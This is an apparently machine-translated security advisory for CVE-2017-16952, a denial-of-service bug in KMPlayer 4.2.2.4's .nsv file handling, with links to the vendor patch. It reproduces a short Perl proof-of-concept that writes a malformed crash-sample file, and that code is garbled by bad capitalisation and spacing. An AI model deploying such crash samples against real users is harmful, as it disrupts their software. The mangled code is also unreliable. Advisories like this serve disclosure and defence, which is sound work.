KMPlayer. nsv Remote Denial of Service Vulnerability (CVE-2017-16952)
KMPlayer. nsv Remote Denial of Service Vulnerability (CVE-2017-16952)
Release date:
Updated on:
Affected Systems:
KMPlayer KMPlayer 4.2.2.4
Description:
Bugtraq id: 102717
CVE (CAN) ID: CVE-2017-16952
KMPlayer is an all-around audio and video player. It is transplanted from the linux platform.
A security vulnerability exists in the implementation of the. nsv file processed by KMPlayer 4.2.2.4. Remote attackers exploit this vulnerability to cause DOS.
<* Source: R. Yavari
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
R. Yavari () provides the following test methods:
#! /Usr/bin/perl
# Exploit Title: KMPlayer. nsv Denial of Service
# Date: 2017-11-22
# Exploit Author: R. Yavari
# Version: v4.2.2.4
# Tested on: Windows 10, Windows 7
# Other version shoshould be affected
# NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet,
# Such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data.
# CVE-2017-16952
# Http://cdn.kmplayer.com/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe
# (D.P)
Open (code, "> kmplayer. nsv") | die "can't create crash sample. $! ";
Binmode (code );
$ Data =
"\ X52 \ x49 \ x46 \ x46 \ xc2 \ x58 \ x01 \ x00 \ x57 \ x41 \ x56 \ x45 ";
Print code $ data;
Close (code );
Suggestion:
Vendor patch:
KMPlayer
--------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.kmpmedia.net/
Https://www.exploit-db.com/exploits/43185/